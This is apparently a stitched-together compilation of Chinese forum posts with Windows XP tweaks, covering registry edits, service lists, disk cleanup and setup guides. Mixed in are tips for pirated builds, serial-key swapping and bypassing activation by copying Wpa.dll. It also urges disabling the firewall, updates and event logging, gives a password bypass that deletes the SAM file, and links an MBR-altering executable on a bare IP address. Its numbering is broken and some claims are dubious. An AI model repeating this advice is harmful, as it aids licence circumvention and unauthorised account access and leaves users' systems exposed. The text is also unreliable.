在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\在〔Policies〕下增加一个机码名〔Explorer〕(如果已有便不用增加)\在〔Explorer〕增加一个 DWORD 值〔NoLowDiskSpaceChecks〕
数值数据为〔1〕= 停止通知,值数据为〔0〕= 默认值启动通知

关闭 windows 自动更新 :

鼠标右点〔我的电脑〕\〔内容〕\〔自动更新〕
选“关闭自动更新,我要手动更新我的计算机”

关闭启动时窗口标志画面:

在〔开始〕\〔运行〕\键入〔msconfig〕\选〔boot.ini〕
然后在〔启动选项〕内选〔NOGUIBOOT]
重新开机便没有了窗口标志的画面

使用 Windows Media Player 9 播放 DVD 盘:
在〔开始〕\〔运行〕\键入〔DVDPlay〕便会出现 Windows Media Player
按播放 VCD 型式操作便可播放 DVD 了,当然你一定要有 DVDRom 装置
如果还出现问题,在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_CURRENT_USER〕
\〔Software〕\〔Microsoft〕\〔MediaPlayer〕\〔Player〕\在〔Settings〕右边窗口
增加一个字符串值〔EnableDVDUI〕数值数据为〔yes〕

关闭自动重新启动功能:

当 Windows XP 遇到严重问题时便会突然重新开机,按下更改可以取消此功能
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕
\〔CurrentControlSet〕\〔Control〕\〔CrashControl〕\将〔AutoReboot〕dword 值更改为〔0〕重新开机生效

移除共享文档:

除正常〔我的文档〕及〔共享文档夹〕外,每个用户都会有一个独立的活页夹,
如下设定则只会保留我的活页夹,其余的不会显示出来
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕
\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕\〔MyComputer〕\〔NameSpace〕\在〔DelegateFolders〕下删除〔{59031a47-3f72-44a7-89c5-5595fe6b30ee}〕机码

取消 IE 自动缩图功能:

Internet Explorer 6 在浏览图片如大出屏幕,图片便会自动缩小如需取消这功能可按如下修改:
在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔Software〕\〔Microsoft〕\〔Internet Explorer〕\在〔Main〕增加一个字符串值〔Enable AutoImageResize〕数据数值为〔NO〕

让 IE6 可以同时下载超过两个档案:
Internet Explorer 6 同时最多只可以下载两个档案,
按下修改可同时下载多达十个档案
在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔\Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔InternetSettings〕
在右边窗口增加下列两个〔Dword〕值
〔MaxConnectionsPer1_0Server〕数值资料为〔0000000a〕即十进制〔10〕
〔MaxConnectionsPerServer〕数值资料为〔0000000a〕即十进制〔10〕
重新启动计算机生效
[转帖]我的WinXP优化之路[推荐]
转贴]我的WinXP优化之路[推荐]

为了达到这个目的,我们主要从四个方面入手:
1、减少磁盘空间占用
2、终止不常用的系统服务
3、安全问题
4、另外一些技巧
首先问一下,你是不是很想激活XP,不。。。准确的说你是不是想在ms的站上能够升级。如果答案是肯定的话,那我们就先来探讨一下安装的问题,目前流行的V4、V5、V6版本我还是比较推荐的,尤其是V5和V6这两个。安装的过程中有个序列号的问题,我建议你先在机子上算好,然后用这个序列号安装,通常这样安装的XP都可以到MS的站点自由更新。
如果你是已经安装好的XP了,但用的序列号是里到处流传人人都用的那些,也没关系,我们后面会说用sysrep来重新封装的时候会解决序列号更换的问题。

我假设你已经安装完XP了,come on baby ~~

一、瘦身行动

1、在各种软硬件安装妥当之后,其实XP需要更新文件的时候就很少了。删除系统备份文件吧:开始→运行→sfc.exe /purgecache 近3xxM。

2、删除驱动备份: %windows%\driver cache\i386目录下的driver.cab文件,通常这个文件是76M。

3、偶没有看help的习惯,所以保留着%windows%\help目录下的东西对我来说是一种伤害,呵呵。。。都干掉,近4xM。

4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录,都干掉吧,1x-3xM。

5、正好硬盘中还有win2000/server等,所以顺便把pagefile.sys文件都指向一个地方:控制面板→系统→性能—高级→虚拟内存→更改,注意要点“设置”才会生效。

6、卸载不常用组件:用记事本修改\%windows%\inf\sysoc.inf,用查找/替换功能,在查找框中输入,hide,全部替换为空。这样,就把所有的,hide都去掉了,存盘退出后再运行“添加-删除程序”,就会看见“添加/删除 Windows 组件”中多出不少选项;删除掉游戏啊,码表啊等不用的东西。

7、刪除\windows\ime下不用的輸入法,8xM。我重新安装了自己用的zrm输入法,赫赫。

8、如果实在空间紧张,启用NTFS的压缩功能,这样还会少用2x% 的空间,不过我没作。

9、关了系统还原,这破功能对我这样常下载、测试软件的人来说简直是灾难,用鼠标右健单击桌面上的“我的电脑”,选择“属性”,找到“系统还原”,选择“在所有驱动器上关闭系统还原”呵呵,又可以省空间了。

10、还有几个文件,挺大的,也没什么用。。。。忘了名字 :( ,刚安装的系统可以用查找功能查找大于50M的文件来看看,应该能找到的。

如果你能按照上面的过程做完,你的原本1.4G的XP,完全可以减少到800以下。

二、加速计划

WinXP的启动会有许多影响速度的功能,尽管ms说已经作最优化处理过,但对我们来说还是有许多可定制之处。我一般是这样来做的。

1、修改注册表的run键,取消那几个不常用的东西,比如Windows Messenger 。启用注册表管理器:开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS” /BACKGROUND 这个键值,右键→删除,世界清静多了,顺便把那几个什么cfmon的都干掉吧。

2、修改注册表来减少预读取,减少进度条等待时间,效果是进度条跑一圈就进入登录画面了,开始→运行→regedit启动注册表编辑器,找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters, 有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。

3、关闭系统属性中的特效,这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中,设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的,我还是挺喜欢XP的蓝色窗口,所以在“在窗口和按钮上使用视觉样式”打上勾,这样既能看到漂亮的蓝色界面,又可以加快速度。

4、我用Windows commadner+Winrar来管理文件,Win XP的ZIP支持对我而言连鸡肋也不如,因为不管我需不需要,开机系统就打开个zip支持,本来就闲少的系统资源又少了一分,点击开始→运行,敲入:“regsvr32 /u zipfldr.dll”双引号中间的,然后回车确认即可,成功的标志是出现个提示窗口,内容大致为:zipfldr.dll中的Dll UnrgisterServer成功。

5、据说XP的一个系统服务Qos,这个调度要占用一定的网络带宽,像我这样的一毛不拔的人是无法忍受的,去掉方法是:开始菜单→运行→键入 gpedit.msc ,出现“组策略”窗口, 展开 "管理模板”→“网络” , 展开 "QoS 数据包调度程序", 在右边窗右键单击“限制可保留带宽" ,在属性中的“设置”中有“限制可保留带宽" ,选择“已禁用”,确定即可。当上述修改完成并应用后,用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler(QoS 数据包调度程序)"。说明修改成功,否则说明修改失败,顺便把网络属性中的那个Qos 协议也一起干掉(卸载)吧。

6、快速浏览局域网络的共享
通常情况下,Windows XP在连接其它计算机时,会全面检查对方机子上所有预定的任务,这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下,会有个{ D6277990-4C6A-11CF-8D87-00AA0060F5BF }键,把它删掉后,重新启动计算机,Windows XP就不再检查预定任务了,hoho~~~ ,速度明显提高啦!

7、关掉调试器Dr. Watson
我好像从win95年代开始一次也没用过这东西,可以这样取消:打开册表,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支,双击在它下面的Auto键值名称,将其“数值数据”改为0,最后按F5刷新使设置生效,这样就取消它的运行了。沿用这个思路,我们可以把所有具备调试功能的选项取消,比如蓝屏时出现的memory.dmp,在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。


8、被我终止的服务列表以及相关说明

1)alerter 错误警报
2)automatic updates windows 自动更新
3)background intelligent transfer service 微软说使用空闲的网络带宽传数据
4)clipbook 与远程电脑来共享剪贴板内容,我看还是免了吧
5)Computer browser 说什么要维护网络更新列表
6)DHCP client 我不需要这东西
7)Distributed link tracking client 保持局域网连接更新等信息,偶很少用局域网,这东西占用4M左右内存。
8)Distributed Transaction coordinator 协调xxx,和上面的差不多
9)DNS Client 我不需要这东西
10)Error reporting service 错误报告
11)Event Log 系统日志纪录
12)Fast user switching compatibility 用户切换
13)help and support 帮助
14)Human interface device access 据说是智能设备。。。
15)IMAPI CD-burning COM service 偶不用这个刻碟
16)Indexing service 索引,索引什么呢?
17)Internet Connection Firewall(ICF) ICF防火墙
18)IPSEC Services 这个我不懂,你想知道问Quack去
19)Logical Disk manager administrative service 配置磁盘
20)messenger 好像net send 等东西用的就是这个功能
21)MS software shadow copy provider 卷复制备份的
22)Net Logon 我可不想让黑客远程登录进来,关!
23)Netmeeting remote desktop sharing 我不用netmeeting
24)Network DDE  动态数据交换传输
25)Network DDE DSDM 和上面差不多
26)Network Location Awareness 关,我的机子不作共享
27)NTLM Security support provider-telnet 呵呵,关!
28)Performance logs and alert 将系统状态写日志或发警告
29)Portable media serial number 关!
30)Print Spooler 打印机,不幸的是我的机子不连接Print ~
31) QoS RSVP 关!
32)Remote desktop help session manager 远程帮助服务
33)remote Procedure Call LOCATOR 管理RPC
34)remote registry 远程管理注册表
35)removable storage 
36)routing and remote access 我干脆禁用了它
37)security accounts manager 我的系统只是一个客户系统,不用iis。
38)smart card
39)smart card helper 关!!!
40)SSDP Discovery service 我用不到这个
41)system event notification 如果是服务器肯定要记录的
42)system restore service 系统还原服务
43)task scheduler windows 计划服务
44)Telephony 拨号服务,我不拨号还不行吗?
45)telnet
46)terminal services 终端服务
47)uninterruptible power supply UPS,我没有呀
48)universal plug and play device host 太先进了点,用不到
49)upload manager 关了也能传输文件的
50)volume shadow copy 又是备份,晕
51)webclient 没用过
52)Windows Installer MSI服务,我一直关着。
53)windows image acquisition (WIA) 数码设备用的
54)windows management instrumentation driver extensions 关了
55)windows time 时间服务
56)wireless zero configuration 无线网络,偶用不到的
57)WMI perfromance adapter 关!

这里面的一些服务是刚开始就是关的,但我忘了,所以只好把现在系统中关闭的服务基本都列了出来。你根据自己的情况酌情处理吧。

三、我安全吗

多了不谈,基本的共享还是得关的:

修改注册表为以下两个样式:
去除共享
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
——————————————————————
去除IPC$管理
——————————————————————
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
——————————————————————
或者将上面两个保存成个.REG文件,然后双击导入就可以了。


顺便把不要脸的的3721也屏蔽,在hosts文件中加入:

127.0.0.1 cnsmin.3721.com
127.0.0.1http://www.3721.net


四、其他技巧

1、给鼠标右键增加个复制到.../移动到...功能
—————————————————————
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{ C2FBB630-2971-11D1-A18C-00C04FD75D13 }"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{ C2FBB631-2971-11D1-A18C-00C04FD75D13 }"
————————————————————————
将上面内容保存成add.reg文件,然后双击导入就可以了。

2、关了错误报告,KAO !这东西搞得我像个微软免费的测试员似的:点击控制面板---->系统---->高级---->右下角--->错误报告---->禁用错误汇报——>确定!
3、取消分组显示:右键单击任务栏的空白区域,在弹出的菜单中选择“属性”,在弹出的窗口中,取消“分组相似任务栏按钮”前面的对钩,确定就可以了。
4、找回经典的登录窗口,WinXP默认的登录界面虽然漂亮,但如果你想用一个列表中没有的用户登录,你会发现无从下手,改回经典窗口的方法是:点击“开始”→“控制面板”→“用户账户”→“更改用户登录或注销的方式”→把“使用欢迎屏幕”前面的对钩取消,最后点“应用选项”就OK啦。
5、将自己最常用的输入法设置一个快捷键:点击“开始”→“控制面板”→“区域和语言选项”→在弹出的窗口中选择“语言”→“详细信息”→“键设置”在弹出的窗口中找到自己用的输入法,点“更改按键顺序”→在这里选一个快捷键就可以了。
6、关闭计算机时自动结束不响应的任务,注册表:HKEY_CURRENT_USER\Control Panel\Desktop 中的“AugoEndTasks”的键值改为“1”
7、关闭自动更新:右键单击“我的电脑”,点击属性,点击“自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。
8、减少开机磁盘扫描等待时间,开始→运行,键入“chkntfs/t:0”


然后连接到ms站点顺便升级一次就算优化基本完成,对于XP而言,可以采用许多内部命令来看看优化情况,比如tasklist.exe /svc 可以查看系统服务实际使用情况。
优化一个系统,挺麻烦的。所以我们把他保存起来,我们用Ghost生成.GHO文件,这样就可以拿给别人炫耀一下啦,在Ghost之前先要作一个事情,清除系统硬件、注册等信息,否则克隆到不同的机子上将无法启动,在Winxp安装盘上找Deploy.cab 中的sysprep.exe文件。
执行sysprep.exe,选择“重新封装”,下面的标记中可以选择“已提前激活”,还可以选择封装完成后是关机还是重新启动。封装完成后,我们再用带有Ghost的系统盘启动,用Ghost来生成备份.GHO镜像,备份完成!
在执行封装后,重新开机,XP会让我们输入序列号,文中开头所提到的换序列号的办法就是这样换。

Windows XP最新应用技巧大荟萃
Windows XP最新应用技巧大荟萃
1.恢复EXE文件关联
  EXE文件关联出错非常的麻烦,
因为这种情况的出现多是由于病毒引起的,而杀毒软件的主文件都是EXE文件,既然EXE文件关联出错,又怎能运行得了杀毒软件呢?还好XP提供了安全模式下的命令行工具供我们使用,可以利用命令行工具来解决这个问题。
  在安全模式下输入:assoc<空格>.exe=exefile<回车>,屏幕上将显示“.exe=exefile”。现在关闭命令提示符窗口,按Ctrl+Alt+Del组合键调出“Windows安全”窗口,按“关机”按钮后选择“重新启动”选项,按正常模式启动Windows后,所有的EXE文件都能正常运行了!
3.更改Windows XP序列号
  在Windows XP安装完毕以后,
可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号,该怎么办呢?使用激活向导可以满足你的要求。开始之前,强烈建议你在修改之前作一个系统还原点,以免误操作引起不必要的麻烦。

  点击“开始”→“运行”,输入regedit后回车,打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents,在右边右键单击OOBETimer,然后选择修改,至少修改一个字节,确定保存。

  点击“开始”→“运行”,输入%systemroot%\system32\oobe\msoobe.exe /a,选择通过电话激活以后点击“下一步”,点击修改序列号,输入新的序列号以后选择“更新”,如果退回到前一个画面,那么选择稍后激活,并重新启动,反复前面的步骤直到修改成功为止,重新激活。点击确定,安装SP1。

  如果你安装SP1以后不能重新启动,那么启动的时候按F8,选择使用“最后一次正确的配置”,然后重复以上流程。本方法适用于Windows XP Professional。

  4.将EFS选项添加至快捷菜单

  Windows XP所配备的加密文件系统(EFS),可帮助您针对存储在NTFS磁盘卷上的文件和文件夹执行加密操作。如果您已将这个文件加密/解密选项添加至快捷菜单,那么,当用户右键单击某一存储于NTFS磁盘卷上的文件或文件夹时,加密或解密选项便会出现在随后弹出的快捷菜单上。请注意Windows XP Home Edition(家用版)并未提供EFS特性。

  如欲将EFS选项添加至快捷菜单,请依次执行下列操作步骤:在“运行”对话框内输入regedit,展开注册表至下列子键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Exporer\Advanced,在“编辑”菜单上指向“新建”,并单击“DWORD值”,输入EncryptionContextMenu为变量名,并将该变量赋值为1。为确保对注册表进行修改,应在自己的计算机上拥有管理员帐号。

  5.XP选程桌面漏洞解决办法

  Windows XP提供了远程桌面功能,目前被证实存在设计缺陷,可能导致攻击者得到系统远程桌面的账户信息,有助于其进一步攻击。当连接建立的时候,用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号,而是最常被客户端使用的账户名,网络上的嗅探程序可能会捕获到这些账户信息。

  解决方法:到微软主页下载相应的补丁程序,并暂时停止远程桌面的使用,方法是:右键单击“我的电脑”,选择“属性”,在弹出的窗口中,选“远程”标签,勾掉“允许用户远程连接到这台计算机”复选框前的钩,点“确定”即可。

  6.制作密码重设盘

  密码在Windows XP里面是很重要的,但是如果你忘记了没法登陆怎么办?如果你创建了“密码重设盘”,问题就会迎刃而解。在“控制面板”中打开用户帐户,单击您的帐户名,在位于窗口左侧的“相关任务”下面,单击“防止忘记密码”,选择下一步,提示需要一张磁盘,准备一张空白的磁盘插入软驱里面,继续下一步,出现下面输入当前账户的密码以后(图4),按“下一步”即可开始创建,如果你以后忘记了密码,在出现欢迎屏幕时,单击用户名,然后键入密码。如果忘记了密码,则会显示“您是否忘记了自己的密码?”消息,单击“使用密码重设盘”可启动“密码重设向导”,按照“密码重设向导”中的指示,创建新密码,使用新密码登录,然后将密码重设盘收藏到安全地方,以备将来需要重设密码时使用,不必制作新的密码重设盘。

 7.解决因DirectX产生的错误

  如果你在电脑操作中频繁收到DirectDraw错误消息,
则可尝试应用“DirectX诊断工具”解决问题。运行开始菜单中的“附件”→“系统工具”→“系统信息”,在显示的程序界面中,点击菜单栏上的“工具”→“DirectX诊断工具”(图5),其后,在弹出窗口中切换到“显示”标签页,在此查看“DirectX功能”项目,分别测试当前设备上的DircetDraw及Direct3D,若有问题则禁用此项功能。

 8.使用增加的磁盘工具

  在XP中大家熟悉的ScanDisk没有了,许多人对此很不适应,而且觉得很奇怪,其实,Windows XP中已经包含一个增强了的磁盘工具:Check Disk。因此ScanDisk也没必要存在了。如果想使用Check Disk:打开我的电脑,右键点击一个驱动器,选择“属性”。在“工具”选项卡上,在检查错误下,点击“现在检查”。如果想从命令行检查磁盘分区,可以用chkdsk c:这样的格式。

  9.忘记登陆口令的解决办法

  XP对用户安全性的审核即是非常严格的,要是你忘记了设置的口令,可别以为能够像Windows98那样选择“取消”就可以进入系统,这一点相信安装过Windows XP的朋友是很清楚的。由于没有登陆口令,无法进入系统,许多朋友无奈之下选择了重新安装Windows XP的办法,但这种方法既繁琐又费时费力,其实不必那么麻烦的。

  大家知道,Windows 2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制,安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。因此,一旦某个帐号被删除,它的安全标识就不再存在了,即使用相同的用户名重建帐号,也会被赋予不同的安全标识,不会保留原来的权限。

  安全账号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库,所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了:在系统启动前,插入启动盘,进入C:\WINNT\System3\Config\,用ren命令将SAM文件改名,或用del命令将SAM文件删除,重启电脑即可。改名或删除SAM文件以后,试用Administrator登录,密码为空,成功了。

  10.字体安装的优化

  有些朋友需要安装各种不同的字体,但是有些字体本身很大,特别是中文字体,一般在10M左右,一旦安装过多的字体,会使系统盘臃肿不堪,其实,从Win98到WinXP,都可以在安装的时候做一点优化,效果就是不再把新字体拷贝到系统盘。

  以WinXP为例,我们在一个空白的驱动器上建立一个目录:NewFonts(名字、驱动器名字任意定),然后把全部需要安装的字体放到这个目录里面,然后在“开始”→“运行”里面输入fonts,打开字体目录,依次打开“文件”→“安装新字体”,在出现的对话框里面找到D:\NewFonts这个目录,然后去掉“将字体复制到Fonts文件夹”前面的“√”(图6),最后选中要安装的字体,确定即可。

11.声音提示切换键

  在你在进行大量英文/汉字输入的过程中,
大概经常会遇到误按切换键而导致输入频繁出错,从而降低工作效率的情况(特别是快速盲打)。如果我们为切换键设置了声音提示,就可有效地避免这一问题。在“控制面板”中,双击“辅助功能选项”图标,在弹出对话框中查看"键盘"标签页,在此勾选“切换键”项目中的“使用切换键”复选框,最后点击“确定”使设置升效(图7)。

 12.时间校正自动化

  要是Win XP系统下的时钟突然不准了怎么办?相信大多数人都会选用手工方式来重新将时间校准;可惜,无论我们怎么细心,用手工方式总是无法实现精确校时的。要想精确对时钟进行校时的话,我们可以利用下面的方法来实现:

  直接用鼠标双击系统任务栏托盘区中的系统时钟图标,打开“Internet时间”标签页面,在其中选择一台标准的时间服务器,单击确定按钮后,系统自动连接到因特网上,并自动比较计算机内的系统时钟与指定服务器的时钟,要是发现不准确的话就可以自动调整了。不过要想调整精确的话,必须确保自己的系统没有安装防火墙。

  13.XP也可磁盘扫描

  不知何数,在Windows XP之中没有为我们提供磁盘扫描的功能,这给我们对磁盘整理带来了一些不便。为了解决这个,经过潜心研究终于找出了解决方法。

  在“我的电脑”中右击想进行扫描检测的分区,打开其属性对话框,然后切换到“工具”标签,在“查错”区域点击“开始检查”按钮,在随后打开的对话框中选中“自动修复文件系统错误”、“扫描并试图恢复坏扇区”两个选项(图8),然后点击“开始”按钮即可。

 14.禁止使用IE6下载文件

  有些时候我们需要禁止IE下载文件功能,但是一直苦于没有办法使用系统的设置,其实如果在注册表中稍作修改的话就可以满足大家的要求了。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3,然后在右边找到1803这个Dword值,双击修改为3即可。重新启动IE看看还能不能够下载的?如果要取消限制的话,只需要还原Dword值为0即可。

  15.利用光盘检测系统兼容性

  Windows XP作为目前个人安装使用的最新操作系统,在一些老爷机上经常会碰到安装过程出现不兼容的情况,使得安装过程到了一半就被迫结束。为了避免这种情况的发生,我们可以在安装Windows XP之前,借助其安装光盘来对系统的兼容性进行一些检测。

  将安装光盘放入光驱,一般都会自动打开欢迎使用界面(注:如果禁止光盘自动运行,我们可以执行光盘中的SETUP.EXE命令,同样可以打开)点击其界面上的最后一项“检查系统兼容性”然后点击“自动检查我的系统”,这样待上一会就会显示检查结果,汇报不兼容的项目,要想安装使用Windows XP就得先解决好这些不兼容的项目才行,免得中途被迫停止。

16.给Windows XP找回纯DOS

  有时我们不得不使用一些在纯DOS模式下工作的程序,但是在Windows XP中已经找不到纯DOS了,难道我们非得放弃这些在纯DOS下运行的程序吗?当然不是!利用下面的办法就可以让你在Windows XP中进入纯DOS模式。

  第一种方法:利用Win98

  在我们安装XP操作系统前,先用Windows 98启动盘启动系统,并通过sys c:命令向c盘传送系统。并将常用的DOS命令拷贝到硬盘中,然后按常规方法安装XP,当安装成功后,在启动菜单的默认菜单"Microsoft Windows XP"下会新增一个“Microsoft Windows”菜单项,选中此菜单项后,由于系统中没有安装Windows98系统,所以此时计算机就会自动转到DOS系统下,而且还是实模式的,这样就达到了我们的目的。

  第二种方法:采用start命令

  在Windows XP的命令解释符中输入:start/seperate要运行的程序,即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序,而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按Alt+Enter键在全屏幕与窗口之间进行切换。

  第三种方法:利用工具软件

  我们还可以使用一个小工具pqvf.exe来达到目的,该软件下载的地址是61.234.226.248/pqvf.exe。该软件是部分网友分析了PQ Magic的相关文件,并提取了部分文件制作的软件,可以让那些Windows XP用户迅速引导到纯DOS下,重新启动后又可以正常使用Windows XP启动。

  下载后的pqvf.exe文件是一个自解压程序,解压后的文件名字和作用如下:MBR.dat和restrmbr.exe这两个文件的主要作用是用来恢复硬盘的主引导记录的,作用与执行FDISK/mbr命令一样,可以清除主引导扇区而不改变分区表结构。Vfinst9x.exe用于在Windows 9x下启动纯DOS界面,VfinstNT.exe用于在Windows XP下启动纯DOS界面。pqvf.vfd中则包含有启动的软磁盘映像文件。

  具体方法是:直接运行VfinstNT.exe,vfinstNT.exe文件,它们会修改硬盘主引导记录,然后Windows XP会自动重新启动,重启动后你看到的盘符将是A:。敲入ver命令可以查看当前的DOS版本,显示的是“Windows 98(version 4.10.2222)”,看来已是纯DOS了!而且像himem.sys.emm386.exe、光驱驱动和鼠标驱动程序这样的必备驱动也安装了,并且还自动装上一个简单的汉字系统,完全可以应付一般的DOS应用了。如果想回到Windows XP界面,只要重新启动计算机就可以了。

四十六、在Windows XP中对文件进行加密

在Windows XP中确实可以直接对文件(夹)进行加密,但是,这需要一个前提:要加密的文件(夹)所在的硬盘分区是NFTS格式的。如果你的硬盘分区不是NFTS格式,请进行操作转换后,再按下面的方法进行加密。

  选中需要加密的文件(夹),右击鼠标键,在随后弹出的快捷菜单中,选“属性”选项,在“常规”标签中,按“高级”按钮打开“高级属性”对话框,选中其中的“加密内容以便保护数据”选项后,确定退出即可。

  特别需要提醒的是:如果用上述方法对文件(夹)进行了加密,以后重新安装系统之前,最好对它进行解密(解密与加密方法相似)操作,否则系统重装后,可能造成文件(夹)不能正常打开。

四十七、在Windows XP中运行DOS程序

  问:近日我将系统升级为Windows XP,但是我的一些旧的排版软件需要在DOS下运行,而Windows XP中已经没有纯DOS了,请问应该怎么运行DOS程序呢?

  答:可以采用start命令来运行。在Windows XP的命令提示符中输入:start/seperate要运行的程序,即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序,而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按“Alt+Enter”键在全屏幕与窗口之间进行切换。

四十八、XP重装需要激活的问题

由于简体中文版的Windows XP采取了激活的反盗版技术,一般重新安装Windows XP必须重新激活。其实,我们在第一次激活后,只要先备份好Windows下面的System32子目录中的Wpa.dll文件。以后重新安装Windows XP后,只需要复制该文件到Windows下System32子目录中即可激活。如果你不放心,也可以单击“开始”→“运行”,输入如下命令:oobe/msoobe /a来检测你的XP是否已经激活。

四十九、巧妙安装各种Windows操作系统

对于新购置的电脑,在完成对硬盘的分区、格式化操作以后,就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。

  安装Windows 98

  新安装Windows 98系统,可以使用Windows 98系统启动盘启动计算机,然后将Windows 98安装光盘放入光驱,在DOS提示符状态下,进入光盘所在驱动器,然后进入Windows 98安装目录,运行Setup命令即可开始安装Windows 98。

  在开始安装时,安装程序会自动调用Scandisk程序对电脑系统进行检测,检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时,单击选中“接受协议”选项并单击“下一步”按钮,这时会要求你输入“产品密钥”,也就是我们常说的Windows 98安装序列号,完成后单击“下一步”按钮进行安装。

  Windows 98安装程序进入“正在收集计算机的相关信息”界面,并对系统进行检查,以确保有足够的硬盘空间来安装Windows 98。完成后,即可按照提示,单击“下一步”按钮,选择“典型安装”方式,输入用户名和单位名称后,进入用户区域选择窗口,区域的选择主要是确定操作系统的系统时间以及日期,可以在列表中选择“中国”,然后单击“下一步”按钮。

  在安装过程中,安装程序会询问用户是否创建启动盘,如果你还没有自己的Windows 98启动盘,那么建议选择“确定”按钮创建,否则单击“取消”按钮。在接下来的过程中,就不必我们为之操心了,安装程序会向硬盘拷贝数据,并完成最后的安装过程。文件复制结束后,会提示重新启动计算机,重启后,即可直接进入Windows 98安装程序,并在左侧显示安装剩余时间,耐心地等待过后,你就会发现,Windows 98已经被安装到系统中了。

  小技巧:

  往往我们在安装Windows 98时,通常会在命令行状态下输入Setup命令进行安装,然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程,如果打算要Windows快些安装,可以在使用Setup命令的时候,使用一些参数,从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数:

  /t:tmp:指定存放临时文件的目录

  /id:跳过磁盘空间检查

  /ie:不制作启动盘

  /ih:不检查注册表

  /im:跳过内存检查

  /is:不执行磁盘扫描

  /iv:安装时不显示版本说明

  我们想快速安装Windows 98,就可以输入命令:setup /id/ie/ih/im/is/iv,这样安装程序就会直接进入文件复制过程,从而省下了大量的安装时间。

  安装Windows Me

  Windows Me的安装可分为升级安装和完全安装两种类型,Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装,但不能从Windows 3.x中升级。

  Windows Me提供了三种安装方式,一是使用启动盘启动计算机,并进入安装目录执行Setup程序,需要注意的是,在执行安装程序之前,需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动,自动执行安装程序。第三种方式是,在当前的操作系统中运行Windows Me的安装程序,比如在Windows 98系统中直接运行安装程序。

  无论采用哪种安装方式,其操作过程基本都是一样的,与前面介绍的Windows 98安装程序类似。

  如果你的电脑主频低于150MHz,那么会出现“在计算机上无法安装Windows,因为处理器低于150MHz,单击‘确定’退出安装程序”的提示,这时不要着急,可以输入命令:setup/nm即可开始安装了。

  另外,Windows Me的安装程序也存在一些参数(同Windows 98)。

  安装Windows 2000和Windows XP

  Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装,在光驱中放入Windows 2000安装盘后,会自动运行Windows 2000安装程序。选择全新安装后,会要求输入产品序列号,然后即可开始复制安装文件并重新启动计算机。

  在重新启动后的界面中,按下回车键则可以开始安装Windows 2000,并进入安装目录选择窗口,同时选择需要安装的盘符。在接下来的窗口中,会要求选择文件系统的格式,为了可以高效发挥Windows 2000系统性能,建议选择“将磁盘分区转换为NTFS”,完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。

